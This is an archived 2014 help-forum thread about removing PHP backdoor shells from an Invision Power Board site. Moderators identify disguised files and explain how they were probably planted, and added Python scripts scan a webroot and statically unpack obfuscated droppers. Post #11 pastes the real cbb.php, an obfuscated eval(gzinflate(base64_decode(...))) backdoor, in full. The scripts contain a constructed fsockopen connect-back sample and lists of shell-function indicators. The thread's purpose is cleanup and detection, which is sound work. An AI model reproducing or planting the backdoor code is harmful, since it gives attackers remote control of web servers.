
Virus on my website?

virus remove infection

This topic has been archived. This means that you cannot reply to this topic.
15 replies to this topic

#1 Keslaw

Keslaw

    CC Lurker

  • New Member
  • 7 posts

Posted 01 November 2014 - 09:48 AM

If this is the wrong section, please move it to the proper one.

 

I found viruses on my website. I had to put the code of the 2 infected files on pastebin.com, because it is really long code and this forum returns an error when I try to post it directly here :)

 

First file (I think that back_connect here is the main problem; anyway, when I try to remove it, the file is still detected as infected, and I don't know exactly which code I have to remove from it):

http://pastebin.com/5gV5MtQt

 

Second file (like first one):

http://pastebin.com/QHkY039N

 

Please help ASAP, thank you in advance.



#2 dargueta

dargueta

    I chown trolls.

  • Moderator
  • 4854 posts

Posted 01 November 2014 - 10:24 AM

In the first file, delete back_connect_p and everything inside the if(isset($_POST['p1'])) block. That's lines 1476 to 1498 in the first file and 2999-3039 in the second one.

 

If the files keep replacing themselves you have yourself a significantly more complicated problem.


Edited by dargueta, 01 November 2014 - 10:26 AM.

sudo rm -rf / && echo $'Sanitize your inputs!'


#3 Keslaw

Keslaw

    CC Lurker

  • New Member
  • 7 posts

Posted 02 November 2014 - 12:01 AM

After deleting those lines in first file, avast still detects: PHP:Shell-AA [Trj] 



#4 dargueta

dargueta

    I chown trolls.

  • Moderator
  • 4854 posts

Posted 02 November 2014 - 12:05 AM

Also delete bind_port_p.




#5 Keslaw

Keslaw

    CC Lurker

  • New Member
  • 7 posts

Posted 02 November 2014 - 12:15 AM

I did, it still detects it.



#6 dargueta

dargueta

    I chown trolls.

  • Moderator
  • 4854 posts

Posted 02 November 2014 - 12:34 AM

After some digging around (see here) I've come to the realization that the entire file is the virus - it's a backdoor shell that an attacker can use via PHP.




#7 Keslaw

Keslaw

    CC Lurker

  • New Member
  • 7 posts

Posted 02 November 2014 - 12:40 AM

So, removing those 2 files won't fix this?



#8 dargueta

dargueta

    I chown trolls.

  • Moderator
  • 4854 posts

Posted 02 November 2014 - 12:44 AM

It will. Both files are viruses; delete them and you should be okay.




#9 Keslaw

Keslaw

    CC Lurker

  • New Member
  • 7 posts

Posted 02 November 2014 - 01:44 AM

Are you sure?

 

Locations and names of both ones:

 

forum_name/cache/settings.php
ips_kernel/classKernel.php


#10 Alexander

Alexander

    YOL9

  • Moderator
  • 3963 posts

Posted 02 November 2014 - 10:11 AM

The attacker is most successful when they do not arouse suspicion, and so if they put a file named "settings.php" in a cache folder you naturally assume it is designed to be there. But does a cache have settings? And why is it in a separate file and not in the main control panel?

 

The second seems even more likely to be fake, and so I look up "ips_kernel" on my favourite flavour of search engine and find it is a folder within Invision Power Board, and that in a directory listed on their site of that folder (of at least IPB 3.3.0) there is no file named classKernel.php

http://community.inv...9379730628.html

 

If someone sees "ips_kernel" and understands it is part of their system, and then sees classKernel (which is similar to the actual classDb file in there belonging to IPB) it would probably fly past the webmaster, and that is the hope of the attacker.

 

Remember, you often have to think like a criminal to beat one. If they put "backdoorlulz.php" in every folder it will surely be found and removed much faster.

 

 

Quote (Keslaw): I did, it still detects it.

 

This is because your antivirus has a signature-based detection for these malicious backdoor scripts, and only needs to store some common samples of the entire file to realise it is the backdoor file. If someone changes one line, it will still detect it, which is the idea behind the antivirus having heuristics to be useful to the end-user so that it is harder for people to obscure malware.

 

If you are worried about the two files being important, quarantine them if possible, however they are very unlikely part of the system.

 

You then have to realise that the files were placed there somehow, not magically: either through shell/FTP/web panel access (change all of your passwords immediately!) or through a vulnerability, not only in IPB but in any other software you may have installed on your server beside IPB. The unfortunate possibility also remains that, if you are using shared hosting, someone compromised the main underlying system and infected everybody indiscriminately.

 

Alexander.


Edited by Alexander, 02 November 2014 - 10:16 AM.

All new problems require investigation, and so if errors are problems, try to learn as much as you can and report back.
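Alexander's two points, that the planted files were named to blend in (settings.php in cache/, classKernel.php sitting next to the real classDb.php) and that they got there somehow, are what an integrity scan makes mechanical. The Python script below is an added example written for this thread, not code from the forum or from Invision Power Board: it walks a webroot, flags PHP files containing the indicator strings named in this thread (back_connect, bind_port, the $_POST['p1'] trigger) plus generic packed-eval and exec-style patterns, and compares every file against a manifest of known-good SHA-256 hashes so that files the vendor never shipped, and shipped files that were modified, stand out even when their names look legitimate. The directory tree, the file contents and the manifest are all constructed for the demo; a real manifest would be generated from a pristine copy of the same IPB version.

```python
import hashlib
import re
import tempfile
import time
from pathlib import Path

# Indicator patterns. The first three are the strings from this thread's files
# (back_connect_p, bind_port_p, the $_POST['p1'] trigger); the rest are generic.
SUSPICIOUS = {
    "back_connect": re.compile(r"back_connect", re.I),
    "bind_port": re.compile(r"bind_port", re.I),
    "p1_trigger": re.compile(r"\$_(POST|GET|REQUEST)\s*\[\s*['\"]p1['\"]\s*\]"),
    "packed_eval": re.compile(r"eval\s*\(\s*(gzinflate|gzuncompress|str_rot13|base64_decode)\s*\(", re.I),
    "exec_func": re.compile(r"\b(shell_exec|passthru|proc_open|popen|system)\s*\(", re.I),
}
PHP_SUFFIXES = {".php", ".phtml", ".php5", ".inc"}


def scan_file(path):
    """Names of SUSPICIOUS patterns found in one file (empty list if none)."""
    try:
        text = Path(path).read_text(errors="replace")
    except OSError:
        return []
    return [name for name, rx in SUSPICIOUS.items() if rx.search(text)]


def scan_webroot(root, manifest=None, newer_than_days=None):
    """Walk root and return [(relative_path, [reasons])] for every file that is
    suspicious: indicator hits in PHP files, absence from the known-good manifest
    ({relpath: sha256}), a hash mismatch against it, or a recent mtime."""
    root = Path(root)
    findings = []
    now = time.time()
    for path in sorted(root.rglob("*")):
        if not path.is_file():
            continue
        rel = path.relative_to(root).as_posix()
        reasons = []
        if path.suffix.lower() in PHP_SUFFIXES:
            reasons += ["indicator:" + n for n in scan_file(path)]
        if manifest is not None:
            digest = hashlib.sha256(path.read_bytes()).hexdigest()
            if rel not in manifest:
                reasons.append("not-in-manifest")
            elif manifest[rel] != digest:
                reasons.append("hash-mismatch")
        if newer_than_days is not None and now - path.stat().st_mtime < newer_than_days * 86400:
            reasons.append("recently-modified")
        if reasons:
            findings.append((rel, reasons))
    return findings


# Constructed "pristine" contents of two shipped files (not real IPB code).
CLEAN_DB = "<?php\nclass classDb { public function connect() { return true; } }\n"
PRISTINE_INDEX = "<?php\nrequire 'ips_kernel/classDb.php';\n"


def sample_manifest():
    """Manifest as it would be generated from a clean install (constructed)."""
    return {
        "index.php": hashlib.sha256(PRISTINE_INDEX.encode()).hexdigest(),
        "ips_kernel/classDb.php": hashlib.sha256(CLEAN_DB.encode()).hexdigest(),
    }


def build_sample_tree():
    """Constructed webroot mirroring the thread: one shipped file intact, one
    shipped file tampered with, and three planted files in ips_kernel/ and cache/."""
    root = Path(tempfile.mkdtemp(prefix="webroot-"))
    (root / "ips_kernel").mkdir()
    (root / "cache").mkdir()
    (root / "ips_kernel" / "classDb.php").write_text(CLEAN_DB)
    # Shipped file with an include appended by the attacker (hash will not match).
    (root / "index.php").write_text(PRISTINE_INDEX + "<?php @include 'cache/cbb.php'; ?>\n")
    # Planted backdoor, named to look like a kernel class (constructed body).
    (root / "ips_kernel" / "classKernel.php").write_text(
        "<?php\nfunction back_connect_p($ip,$port){ $s=fsockopen($ip,$port); }\n"
        "if(isset($_POST['p1'])){ back_connect_p($_POST['p1'],$_POST['p2']); }\n")
    # Packed dropper in the style of cbb.php (blob is a placeholder, not the real one).
    (root / "cache" / "cbb.php").write_text(
        "<?error_reporting(0);print(___);eval(gzinflate(base64_decode('AAAA')));?>")
    # A file with no code indicators at all: only the manifest catches it.
    (root / "cache" / "df.php").write_text(
        "<html><head><title>404 Error - Page Not Found</title></head></html>\n")
    return root


if __name__ == "__main__":
    root = build_sample_tree()
    for rel, reasons in scan_webroot(root, sample_manifest()):
        print(f"{rel}: {', '.join(reasons)}")
```

Note what the manifest adds over string matching: df.php has no suspicious code at all and classKernel.php could easily be rewritten to avoid every pattern above, but neither is in the list of files the vendor shipped, and index.php is in the list with the wrong hash. On a real host, generate the manifest from a fresh download of the same version, and treat every "not-in-manifest" PHP file as hostile until proven otherwise.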


#11 Keslaw

Keslaw

    CC Lurker

  • New Member
  • 7 posts

Posted 02 November 2014 - 10:33 AM

Ok, I deleted those 2, but I found in the cache folder 2 files named: bbb.php and cbb.php and df.php

 

bbb.php code:

 

http://pastebin.com/Y24t3MEC


cbb.php code:

 
==============================================================================
=========================        END       ===================================
========================= /index.php?<?error_reporting(0);print(___);eval(gzinflate(base64_decode('lVZtb9s2EP6cAPkPV8GAZcCJ7XSfYmRA0aZFMTQZnHT90BUCI51iwhKpkVTdbMh/3/FI+WVzHBcwoJC8e/jcPXfHWHSZkzVmlaylg3Q8mJ4c9/64mt1+vLmGS0gmZ+PEb8mGVr3sw9Xd175s+t+mALTbaOPW+37FJ3yWz1u1yKz8G8li8st47GGWRjrMBO2otqr8DhqjzdaOnWNV0brfKlEjnIopLKcgiymM7qUa2Tmcyr43LATWWpElQxd43z7EhSwhLVuVO6lVhj+kdTbtN7lyVVZqs+gPBvDPyfHRaATvaQlCFTAX3xHcHKERBpWDxugcrQXydmTaa2RB4GuM1GfqiH7+rnB6CaeTAHzUGKmcdGlyNZvdzC7grVB9B94vYb8jD5tO+O+nbZyIwAYkBwCx/D1w8ns2eAT2n8QikM5bs8VagKUPRQ8VigJNMP8iKbFaVY9g2zxHLIAuXSLzwiJyaLSVPzKLzsoiHTwTlReti6oz3RmZT91KpwltPgFWFhlvBfflzez64/WHC3gvZEWsnIbgIy2eAdzNpQX6/dVS8UCua4/mNVOaciqcqM74brounxfSpMmI120t7CKWtNX5ghiU/qsbVClV9BC4gOlDRah0+FpnhvCanXw2XrHnYJtvtCO92DFGvg78icvR5kY2ThvbYE5XC2PEY3pyTN0xhstf4zppZIPJEBKTDIastXWFVD5cAf6M5BUuaDyXVQFLr6EhUaE0uma4yQ645Qacbt0LeNyWlHaGO98NBx0cxXwwnM+GnxOxLC+5QLMgAPc5JX07U14UwrUrAaTNDFrdmhzTDmjwH0G2usw2YqmA0XcIQ7qhqH19Z/cVSSvVQxpu/Dr+NgQWfo/N5ACb8702vp7i+cnxKoJb35DWljQDH8Hnh9rA4Hc01CthIFJTUM1ecMkmwXtJKUdIY3vy0ENdhisGz0yiWwbLtVLI4xEcmloq4bCIDXxPpBfdYFqDdvHvB+6U3o/a8wXMQz/UWUzKRo5XqWTvnmrrLJ8L9YBF5m1p5JDzKr8VxZJGUPKNr0xoaP+6DPlxYSgfkFTZ9r3Bs4uMJzE/JwNYC3Tz9jeYXb15F+PpSdW0/vErvfMKaf3qBbNnsS4gIES4kjlvVmI4HmwKsea9kahDuN+9u/l8t4/9Bt5hETDiMzHEVLzM//xw/lRkL/M//xn+hPgT/PkpK/NK22jgD7p1J9r/9yY79kJN8yDs9uNU86bxv5aOKnGnKqfBse7xV/FB3exDSKLZnyrpGP8L')));?> ===================================
==============================================================================

df.php

 

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html>


<head>
   <title>404 Error - Page Not Found</title>


<script type="text/javascript" language="JavaScript">
<!--
var domainname = window.location.hostname;
var google_afd_request = {
    client: 'ca-dp-oversee_ncd',
    domain_name: domainname,
    referrer: document.referrer,
    session_token: 'create'
};
var param_name = '';
var param_value = '';
var frame;


var registrar_frameset = function(params) {
    if (params['a_id']) {
        param_name = 'a_id';
    }
    else if (params['o_id']) {
        param_name = 'o_id';
    }
    param_value = params[param_name];
    frame = document.getElementById(params['frame']);


    document.write('<title>' + domainname + '</title>\n');
    document.write('<meta name="keywords" content="' + domainname + '">\n');
    document.write('<meta name="description" content="' + domainname + '">\n');


    var token_url = 'http://pagead2.googlesyndication.com/apps/domainpark/show_afd_ads.js';
    document.write('<script type="text/javascript" language="JavaScript" ' +
                   'src="' + token_url + '"></' + 'script>\n');
}


function google_afd_ad_request_done(response) {
    var url = 'http://dsnextgen.com/?domainname=' + domainname +
              (param_name ? ('&' + param_name + '=' + param_value) : '') +
              '&session_token=' + response.session_token;
    if (frame) {
        frame.name = domainname;
        frame.location = url;
    }
    else {
                document.write('<table style="border: 1px dashed rgb(204, 204, 204);" align="center" border="0" cellpadding="6" cellspacing="0" width="800"> <tr> <td style="font-family: Arial,Helvetica,sans-serif; font-size: 12px;"> <h1 style="margin:0px;">Page Not Found</h1> <p style="margin-top:0px;">The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. Please try the following:</p> <ul> <li>If you typed the page address in the Address bar, make sure that it is spelled correctly.</li> <li>Click the Back button in your browser to try another link.</li> <li>Use a search engine like <a href="http://www.google.com">Google</a> to look for information on the Internet.</li> </ul> </td> </tr> </table>');
        document.write('<iframe src="' + url + '" frameborder="0" height="800" scrolling="auto" width="100%"></iframe>');
    }
}
-->
</script>


<script type="text/javascript" language="JavaScript">
 registrar_frameset({a_id: 101686}); 
</script>
</head>


</html>


#12 dargueta

dargueta

    I chown trolls.

  • Moderator
  • 4854 posts

Posted 02 November 2014 - 05:08 PM

Oh dude cbb.php is totally a virus. I decoded and unpacked the code and it opens a back door shell as well. bbb.php looks like it's triggering cbb.php or doing some other logging thing. Blow that away too.


Edited by dargueta, 02 November 2014 - 05:12 PM.

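dargueta says he decoded and unpacked cbb.php. The wrapper shown in that paste, eval(gzinflate(base64_decode('...'))), can be peeled statically without ever running the PHP, which is how you should look inside such a file. The Python below is an added example for this thread, not code from the post or from any of the files involved: it implements gzinflate() as raw DEFLATE (wbits = -15, which is what PHP's gzinflate expects), strips nested wrappers layer by layer with a hard cap, and reports which backdoor indicators the decoded source contains. The sample payload is built inside the script from a constructed snippet (the fsockopen line is invented for the demo); the blob from the thread is not embedded.

```python
import base64
import re
import zlib

# Wrapper as it appears in cbb.php: eval(gzinflate(base64_decode('<blob>'))).
# Only proper base64 alphabet is accepted, so a truncated or edited blob simply
# does not match and is left in place for manual inspection.
LAYER_RE = re.compile(
    r"eval\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)\s*\)\s*\)",
    re.IGNORECASE,
)

# Substrings worth flagging in decoded output; the first three come from this thread.
INDICATORS = (
    "back_connect", "bind_port", "$_POST['p1']",
    "fsockopen", "shell_exec", "passthru", "proc_open", "popen(",
)


def gzinflate(data: bytes) -> bytes:
    """PHP gzinflate() consumes raw DEFLATE with no zlib/gzip header: wbits = -15."""
    return zlib.decompress(data, -15)


def gzdeflate(data: bytes) -> bytes:
    """Inverse of gzinflate(); used only to build the constructed sample below."""
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)
    return comp.compress(data) + comp.flush()


def unpack_layers(source: str, max_layers: int = 20):
    """Replace each eval(gzinflate(base64_decode('...'))) with its decoded content,
    repeating until no wrapper is left or max_layers is hit. Purely static: the
    decoded PHP is text, never executed. Returns (decoded_source, layers_removed)."""
    current, layers = source, 0
    while layers < max_layers:
        m = LAYER_RE.search(current)
        if m is None:
            break
        try:
            inner = gzinflate(base64.b64decode(m.group(1))).decode("utf-8", "replace")
        except (ValueError, zlib.error):
            # Truncated or corrupted blob: stop rather than loop on the same match.
            break
        current = current[:m.start()] + inner + current[m.end():]
        layers += 1
    return current, layers


def find_indicators(source: str) -> list:
    """Return the indicator strings present in source, in INDICATORS order."""
    return [s for s in INDICATORS if s in source]


def wrap(php: str) -> str:
    """Produce one obfuscation layer in the style seen in cbb.php (constructed)."""
    blob = base64.b64encode(gzdeflate(php.encode())).decode()
    return f"<?error_reporting(0);print(___);eval(gzinflate(base64_decode('{blob}')));?>"


# Constructed inner payload: a minimal $_POST['p1']-triggered connect-back, invented for the demo.
SAMPLE_INNER = "if(isset($_POST['p1'])){$s=fsockopen($_POST['p1'],(int)$_POST['p2']);}"
SAMPLE = wrap(wrap(SAMPLE_INNER))  # two nested layers, as real droppers often have


if __name__ == "__main__":
    decoded, n = unpack_layers(SAMPLE)
    print(f"layers removed: {n}")
    print("indicators before unpacking:", find_indicators(SAMPLE))
    print("indicators after unpacking: ", find_indicators(decoded))
    print(decoded)
```

Before unpacking, the sample shows none of the indicator strings because everything interesting is inside the compressed blob; that is exactly why a plain grep for back_connect over a webroot misses this kind of dropper, and why an antivirus needs a signature for the wrapper itself (which is what Keslaw's scanner was hitting). After unpacking, the connect-back and the $_POST['p1'] trigger are in plain text. Other wrappers seen in the wild (str_rot13, gzuncompress, strrev) need their own decoder step in the same loop.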




